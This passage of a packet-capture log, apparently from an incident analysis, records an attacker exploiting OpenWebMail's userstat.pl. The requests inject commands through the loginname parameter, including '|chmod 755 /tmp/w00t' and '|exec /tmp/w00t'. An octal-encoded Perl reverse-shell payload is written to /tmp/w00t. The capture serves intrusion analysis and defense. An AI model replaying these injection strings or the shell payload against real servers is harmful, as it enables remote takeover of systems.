35 43 31 31 30 25 35 43 31 34 31 25 35 43 31 35  5C110%5C141%5C15
36 25 35 43 31 34 34 25 35 43 31 35 34 25 35 43  6%5C144%5C154%5C
31 34 35 25 35 43 30 35 35 25 35 43 30 37 36 25  145%5C055%5C076%
35 43 31 34 36 25 35 43 31 35 31 25 35 43 31 35  5C146%5C151%5C15
34 25 35 43 31 34 35 25 35 43 31 35 36 25 35 43  4%5C145%5C156%5C
31 35 37 25 35 43 30 35 34 25 35 43 30 34 30 25  157%5C054%5C040%
35 43 30 36 31 25 35 43 30 35 31 25 35 43 30 37  5C061%5C051%5C07
33 25 35 43 30 34 30 25 35 43 31 34 34 25 35 43  3%5C040%5C144%5C
31 36 35 25 35 43 31 36 30 25 35 43 30 36 32 25  165%5C160%5C062%
35 43 30 35 30 25 35 43 31 32 33 25 35 43 31 35  5C050%5C123%5C15
37 25 35 43 31 34 33 25 35 43 31 35 33 25 35 43  7%5C143%5C153%5C
31 34 35 25 35 43 31 36 34 25 35 43 31 33 37 25  145%5C164%5C137%
35 43 31 31 30 25 35 43 31 34 31 25 35 43 31 35  5C110%5C141%5C15
36 25 35 43 31 34 34 25 35 43 31 35 34 25 35 43  6%5C144%5C154%5C
31 34 35 25 35 43 30 35 35 25 35 43 30 37 36 25  145%5C055%5C076%
35 43 31 34 36 25 35 43 31 35 31 25 35 43 31 35  5C146%5C151%5C15
34 25 35 43 31 34 35 25 35 43 31 35 36 25 35 43  4%5C145%5C156%5C
31 35 37 25 35 43 30 35 34 25 35 43 30 34 30 25  157%5C054%5C040%
35 43 30 36 32 25 35 43 30 35 31 25 35 43 30 37  5C062%5C051%5C07
33 25 35 43 30 34 30 25 35 43 31 34 35 25 35 43  3%5C040%5C145%5C
31 37 30 25 35 43 31 34 35 25 35 43 31 34 33 25  170%5C145%5C143%
35 43 30 34 30 25 35 43 31 37 33 25 35 43 30 34  5C040%5C173%5C04
30 25 35 43 30 34 32 25 35 43 30 35 37 25 35 43  0%5C042%5C057%5C
31 34 32 25 35 43 31 35 31 25 35 43 31 35 36 25  142%5C151%5C156%
35 43 30 35 37 25 35 43 31 36 33 25 35 43 31 35  5C057%5C163%5C15
30 25 35 43 30 34 32 25 35 43 30 34 30 25 35 43  0%5C042%5C040%5C
31 37 35 25 35 43 30 34 30 25 35 43 30 34 32 25  175%5C040%5C042%
35 43 30 34 32 25 35 43 30 37 33 25 35 43 30 31  5C042%5C073%5C01
32 25 35 43 25 32 32 25 32 32 25 32 30 25 33 45  2%5C%22%22%20%3E
2F 74 6D 70 2F 77 30 30 74 0D 0A 0D 0A           /tmp/w00t....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:30.660441 10.1.1.100:80 -> 62.111.240.132:36368
TCP TTL:64 TOS:0x0 ID:33430 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x24126FEC  Ack: 0x899AD808  Win: 0x2D40  TcpLen: 32
TCP Options (3) => NOP NOP TS: 1991962018 763022259

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:38.740509 10.1.1.100:80 -> 62.111.240.132:36368
TCP TTL:64 TOS:0x0 ID:33431 IpLen:20 DgmLen:271 DF
***AP*** Seq: 0x24126FEC  Ack: 0x899AD808  Win: 0x2D40  TcpLen: 32
TCP Options (3) => NOP NOP TS: 1991970099 763022259
48 54 54 50 2F 31 2E 31 20 32 30 30 20 4F 4B 0D  HTTP/1.1 200 OK.
0A 44 61 74 65 3A 20 4D 6F 6E 2C 20 31 33 20 53  .Date: Mon, 13 S
65 70 20 32 30 30 34 20 31 39 3A 30 35 3A 33 30  ep 2004 19:05:30
20 47 4D 54 0D 0A 53 65 72 76 65 72 3A 20 41 70   GMT..Server: Ap
61 63 68 65 0D 0A 50 72 61 67 6D 61 3A 20 6E 6F  ache..Pragma: no
2D 63 61 63 68 65 0D 0A 43 61 63 68 65 2D 63 6F  -cache..Cache-co
6E 74 72 6F 6C 3A 20 6E 6F 2D 63 61 63 68 65 2C  ntrol: no-cache,
6E 6F 2D 73 74 6F 72 65 0D 0A 43 6F 6E 6E 65 63  no-store..Connec
74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 54 72 61  tion: close..Tra
6E 73 66 65 72 2D 45 6E 63 6F 64 69 6E 67 3A 20  nsfer-Encoding:
63 68 75 6E 6B 65 64 0D 0A 43 6F 6E 74 65 6E 74  chunked..Content
2D 54 79 70 65 3A 20 61 70 70 6C 69 63 61 74 69  -Type: applicati
6F 6E 2F 78 2D 6A 61 76 61 73 63 72 69 70 74 0D  on/x-javascript.
0A 0D 0A 33 0D 0A 2F 2F 0A 0D 0A                 ...3..//...

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:38.741406 10.1.1.100:80 -> 62.111.240.132:36368
TCP TTL:64 TOS:0x0 ID:33432 IpLen:20 DgmLen:57 DF
***AP*** Seq: 0x241270C7  Ack: 0x899AD808  Win: 0x2D40  TcpLen: 32
TCP Options (3) => NOP NOP TS: 1991970100 763022259
30 0D 0A 0D 0A                                   0....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:38.741557 10.1.1.100:80 -> 62.111.240.132:36368
TCP TTL:64 TOS:0x0 ID:33433 IpLen:20 DgmLen:52 DF
***A***F Seq: 0x241270CC  Ack: 0x899AD808  Win: 0x2D40  TcpLen: 32
TCP Options (3) => NOP NOP TS: 1991970100 763022259

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:38.900218 62.111.240.132:36368 -> 10.1.1.100:80
TCP TTL:43 TOS:0x0 ID:1302 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x899AD808  Ack: 0x241270C7  Win: 0x1920  TcpLen: 32
TCP Options (3) => NOP NOP TS: 763023086 1991970099

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:38.901170 62.111.240.132:36368 -> 10.1.1.100:80
TCP TTL:43 TOS:0x0 ID:1303 IpLen:20 DgmLen:52 DF
***A*R** Seq: 0x899AD808  Ack: 0x241270C7  Win: 0x1920  TcpLen: 32
TCP Options (3) => NOP NOP TS: 763023086 1991970099

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:38.903687 62.111.240.132:36369 -> 10.1.1.100:80
TCP TTL:43 TOS:0x0 ID:3243 IpLen:20 DgmLen:60 DF
******S* Seq: 0x8A5FC245  Ack: 0x0  Win: 0x16D0  TcpLen: 40
TCP Options (5) => MSS: 1460 SackOK TS: 763023086 0 NOP WS: 0

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:38.903727 10.1.1.100:80 -> 62.111.240.132:36369
TCP TTL:64 TOS:0x0 ID:0 IpLen:20 DgmLen:60 DF
***A**S* Seq: 0x24D38330  Ack: 0x8A5FC246  Win: 0x16A0  TcpLen: 40
TCP Options (5) => MSS: 1460 SackOK TS: 1991970262 763023086
TCP Options => NOP WS: 0

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:38.907726 62.111.240.132:36368 -> 10.1.1.100:80
TCP TTL:43 TOS:0x0 ID:0 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x899AD808  Ack: 0x0  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:38.908162 62.111.240.132:36368 -> 10.1.1.100:80
TCP TTL:43 TOS:0x0 ID:0 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x899AD808  Ack: 0x0  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:39.082972 62.111.240.132:36369 -> 10.1.1.100:80
TCP TTL:43 TOS:0x0 ID:3244 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x8A5FC246  Ack: 0x24D38331  Win: 0x16D0  TcpLen: 32
TCP Options (3) => NOP NOP TS: 763023103 1991970262

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:39.089696 62.111.240.132:36369 -> 10.1.1.100:80
TCP TTL:43 TOS:0x0 ID:3245 IpLen:20 DgmLen:306 DF
***AP*** Seq: 0x8A5FC246  Ack: 0x24D38331  Win: 0x16D0  TcpLen: 32
TCP Options (3) => NOP NOP TS: 763023103 1991970262
47 45 54 20 2F 63 67 69 2D 62 69 6E 2F 6F 70 65  GET /cgi-bin/ope
6E 77 65 62 6D 61 69 6C 2F 75 73 65 72 73 74 61  nwebmail/usersta
74 2E 70 6C 3F 6C 6F 67 69 6E 6E 61 6D 65 3D 7C  t.pl?loginname=|
63 68 6D 6F 64 25 32 30 37 35 35 25 32 30 2F 74  chmod%20755%20/t
6D 70 2F 77 30 30 74 20 48 54 54 50 2F 31 2E 30  mp/w00t HTTP/1.0
0D 0A 55 73 65 72 2D 41 67 65 6E 74 3A 20 4D 6F  ..User-Agent: Mo
7A 69 6C 6C 61 2F 34 2E 30 20 28 63 6F 6D 70 61  zilla/4.0 (compa
74 69 62 6C 65 3B 20 4D 53 49 45 20 36 2E 30 3B  tible; MSIE 6.0;
20 57 69 6E 64 6F 77 73 20 4E 54 20 35 2E 31 29   Windows NT 5.1)
0D 0A 48 6F 73 74 3A 20 32 34 2E 32 2E 31 35 33  ..Host: 24.2.153
2E 31 36 38 0D 0A 50 72 61 67 6D 61 3A 20 6E 6F  .168..Pragma: no
2D 63 61 63 68 65 0D 0A 43 6F 6E 6E 65 63 74 69  -cache..Connecti
6F 6E 3A 20 63 6C 6F 73 65 0D 0A 43 6F 6E 74 65  on: close..Conte
6E 74 2D 54 79 70 65 3A 20 61 70 70 6C 69 63 61  nt-Type: applica
74 69 6F 6E 2F 78 2D 77 77 77 2D 66 6F 72 6D 2D  tion/x-www-form-
75 72 6C 65 6E 63 6F 64 65 64 0D 0A 0D 0A        urlencoded....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:39.089725 10.1.1.100:80 -> 62.111.240.132:36369
TCP TTL:64 TOS:0x0 ID:36280 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x24D38331  Ack: 0x8A5FC344  Win: 0x1920  TcpLen: 32
TCP Options (3) => NOP NOP TS: 1991970448 763023103

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:47.160629 10.1.1.100:80 -> 62.111.240.132:36369
TCP TTL:64 TOS:0x0 ID:36281 IpLen:20 DgmLen:238 DF
***AP*** Seq: 0x24D38331  Ack: 0x8A5FC344  Win: 0x1920  TcpLen: 32
TCP Options (3) => NOP NOP TS: 1991978520 763023103
48 54 54 50 2F 31 2E 31 20 32 30 30 20 4F 4B 0D  HTTP/1.1 200 OK.
0A 44 61 74 65 3A 20 4D 6F 6E 2C 20 31 33 20 53  .Date: Mon, 13 S
65 70 20 32 30 30 34 20 31 39 3A 30 35 3A 33 39  ep 2004 19:05:39
20 47 4D 54 0D 0A 53 65 72 76 65 72 3A 20 41 70   GMT..Server: Ap
61 63 68 65 0D 0A 50 72 61 67 6D 61 3A 20 6E 6F  ache..Pragma: no
2D 63 61 63 68 65 0D 0A 43 61 63 68 65 2D 63 6F  -cache..Cache-co
6E 74 72 6F 6C 3A 20 6E 6F 2D 63 61 63 68 65 2C  ntrol: no-cache,
6E 6F 2D 73 74 6F 72 65 0D 0A 43 6F 6E 6E 65 63  no-store..Connec
74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A 43 6F 6E  tion: close..Con
74 65 6E 74 2D 54 79 70 65 3A 20 61 70 70 6C 69  tent-Type: appli
63 61 74 69 6F 6E 2F 78 2D 6A 61 76 61 73 63 72  cation/x-javascr
69 70 74 0D 0A 0D 0A 2F 2F 0A                    ipt....//.

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:47.161627 10.1.1.100:80 -> 62.111.240.132:36369
TCP TTL:64 TOS:0x0 ID:36282 IpLen:20 DgmLen:52 DF
***A***F Seq: 0x24D383EB  Ack: 0x8A5FC344  Win: 0x1920  TcpLen: 32
TCP Options (3) => NOP NOP TS: 1991978521 763023103

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:47.335709 62.111.240.132:36369 -> 10.1.1.100:80
TCP TTL:43 TOS:0x0 ID:3246 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x8A5FC344  Ack: 0x24D383EB  Win: 0x1920  TcpLen: 32
TCP Options (3) => NOP NOP TS: 763023928 1991978520

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:47.338169 62.111.240.132:36369 -> 10.1.1.100:80
TCP TTL:43 TOS:0x0 ID:3247 IpLen:20 DgmLen:52 DF
***A*R** Seq: 0x8A5FC344  Ack: 0x24D383EB  Win: 0x1920  TcpLen: 32
TCP Options (3) => NOP NOP TS: 763023928 1991978520

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:47.339181 62.111.240.132:36370 -> 10.1.1.100:80
TCP TTL:43 TOS:0x0 ID:205 IpLen:20 DgmLen:60 DF
******S* Seq: 0x8AE4D2F5  Ack: 0x0  Win: 0x16D0  TcpLen: 40
TCP Options (5) => MSS: 1460 SackOK TS: 763023928 0 NOP WS: 0

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:47.339227 10.1.1.100:80 -> 62.111.240.132:36370
TCP TTL:64 TOS:0x0 ID:0 IpLen:20 DgmLen:60 DF
***A**S* Seq: 0x24725205  Ack: 0x8AE4D2F6  Win: 0x16A0  TcpLen: 40
TCP Options (5) => MSS: 1460 SackOK TS: 1991978698 763023928
TCP Options => NOP WS: 0

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:47.342713 62.111.240.132:36369 -> 10.1.1.100:80
TCP TTL:43 TOS:0x0 ID:0 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x8A5FC344  Ack: 0x0  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:47.500442 62.111.240.132:36370 -> 10.1.1.100:80
TCP TTL:43 TOS:0x0 ID:206 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x8AE4D2F6  Ack: 0x24725206  Win: 0x16D0  TcpLen: 32
TCP Options (3) => NOP NOP TS: 763023946 1991978698

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:47.506647 62.111.240.132:36370 -> 10.1.1.100:80
TCP TTL:43 TOS:0x0 ID:207 IpLen:20 DgmLen:299 DF
***AP*** Seq: 0x8AE4D2F6  Ack: 0x24725206  Win: 0x16D0  TcpLen: 32
TCP Options (3) => NOP NOP TS: 763023946 1991978698
47 45 54 20 2F 63 67 69 2D 62 69 6E 2F 6F 70 65  GET /cgi-bin/ope
6E 77 65 62 6D 61 69 6C 2F 75 73 65 72 73 74 61  nwebmail/usersta
74 2E 70 6C 3F 6C 6F 67 69 6E 6E 61 6D 65 3D 7C  t.pl?loginname=|
65 78 65 63 25 32 30 2F 74 6D 70 2F 77 30 30 74  exec%20/tmp/w00t
20 48 54 54 50 2F 31 2E 30 0D 0A 55 73 65 72 2D   HTTP/1.0..User-
41 67 65 6E 74 3A 20 4D 6F 7A 69 6C 6C 61 2F 34  Agent: Mozilla/4
2E 30 20 28 63 6F 6D 70 61 74 69 62 6C 65 3B 20  .0 (compatible;
4D 53 49 45 20 36 2E 30 3B 20 57 69 6E 64 6F 77  MSIE 6.0; Window
73 20 4E 54 20 35 2E 31 29 0D 0A 48 6F 73 74 3A  s NT 5.1)..Host:
20 32 34 2E 32 2E 31 35 33 2E 31 36 38 0D 0A 50   24.2.153.168..P
72 61 67 6D 61 3A 20 6E 6F 2D 63 61 63 68 65 0D  ragma: no-cache.
0A 43 6F 6E 6E 65 63 74 69 6F 6E 3A 20 63 6C 6F  .Connection: clo
73 65 0D 0A 43 6F 6E 74 65 6E 74 2D 54 79 70 65  se..Content-Type
3A 20 61 70 70 6C 69 63 61 74 69 6F 6E 2F 78 2D  : application/x-
77 77 77 2D 66 6F 72 6D 2D 75 72 6C 65 6E 63 6F  www-form-urlenco
64 65 64 0D 0A 0D 0A                             ded....

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:47.506676 10.1.1.100:80 -> 62.111.240.132:36370
TCP TTL:64 TOS:0x0 ID:32106 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x24725206  Ack: 0x8AE4D3ED  Win: 0x1920  TcpLen: 32
TCP Options (3) => NOP NOP TS: 1991978866 763023946

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:55.577196 10.1.1.100:80 -> 62.111.240.132:36370
TCP TTL:64 TOS:0x0 ID:32107 IpLen:20 DgmLen:257 DF
***AP*** Seq: 0x24725206  Ack: 0x8AE4D3ED  Win: 0x1920  TcpLen: 32
TCP Options (3) => NOP NOP TS: 1991986937 763023946
48 54 54 50 2F 31 2E 31 20 32 30 30 20 4F 4B 0D  HTTP/1.1 200 OK.
0A 44 61 74 65 3A 20 4D 6F 6E 2C 20 31 33 20 53  .Date: Mon, 13 S
65 70 20 32 30 30 34 20 31 39 3A 30 35 3A 34 37  ep 2004 19:05:47
20 47 4D 54 0D 0A 53 65 72 76 65 72 3A 20 41 70   GMT..Server: Ap
61 63 68 65 0D 0A 50 72 61 67 6D 61 3A 20 6E 6F  ache..Pragma: no
2D 63 61 63 68 65 0D 0A 43 61 63 68 65 2D 63 6F  -cache..Cache-co
6E 74 72 6F 6C 3A 20 6E 6F 2D 63 61 63 68 65 2C  ntrol: no-cache,
6E 6F 2D 73 74 6F 72 65 0D 0A 43 6F 6E 74 65 6E  no-store..Conten
74 2D 4C 65 6E 67 74 68 3A 20 33 0D 0A 43 6F 6E  t-Length: 3..Con
6E 65 63 74 69 6F 6E 3A 20 63 6C 6F 73 65 0D 0A  nection: close..
43 6F 6E 74 65 6E 74 2D 54 79 70 65 3A 20 61 70  Content-Type: ap
70 6C 69 63 61 74 69 6F 6E 2F 78 2D 6A 61 76 61  plication/x-java
73 63 72 69 70 74 0D 0A 0D 0A 2F 2F 0A           script....//.

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:55.577347 10.1.1.100:80 -> 62.111.240.132:36370
TCP TTL:64 TOS:0x0 ID:32108 IpLen:20 DgmLen:52 DF
***A***F Seq: 0x247252D3  Ack: 0x8AE4D3ED  Win: 0x1920  TcpLen: 32
TCP Options (3) => NOP NOP TS: 1991986937 763023946

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:55.735138 62.111.240.132:36370 -> 10.1.1.100:80
TCP TTL:43 TOS:0x0 ID:208 IpLen:20 DgmLen:52 DF
***A**** Seq: 0x8AE4D3ED  Ack: 0x247252D3  Win: 0x1920  TcpLen: 32
TCP Options (3) => NOP NOP TS: 763024770 1991986937

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:55.736590 62.111.240.132:36370 -> 10.1.1.100:80
TCP TTL:43 TOS:0x0 ID:209 IpLen:20 DgmLen:52 DF
***A*R** Seq: 0x8AE4D3ED  Ack: 0x247252D3  Win: 0x1920  TcpLen: 32
TCP Options (3) => NOP NOP TS: 763024770 1991986937

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

09/13-15:05:55.739713 62.111.240.132:36370 -> 10.1.1.100:80
TCP TTL:43 TOS:0x0 ID:0 IpLen:20 DgmLen:40 DF
*****R** Seq: 0x8AE4D3ED  Ack: 0x0  Win: 0x0  TcpLen: 20

=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+=+

iii. References

[1] PoC for OpenWebMail Remote Command Execution (Userstat.pl)
[2] Gwee - the Generic Web Exploitation Engine
[3] OpenWebMail Exploit Advisory on hackwire.com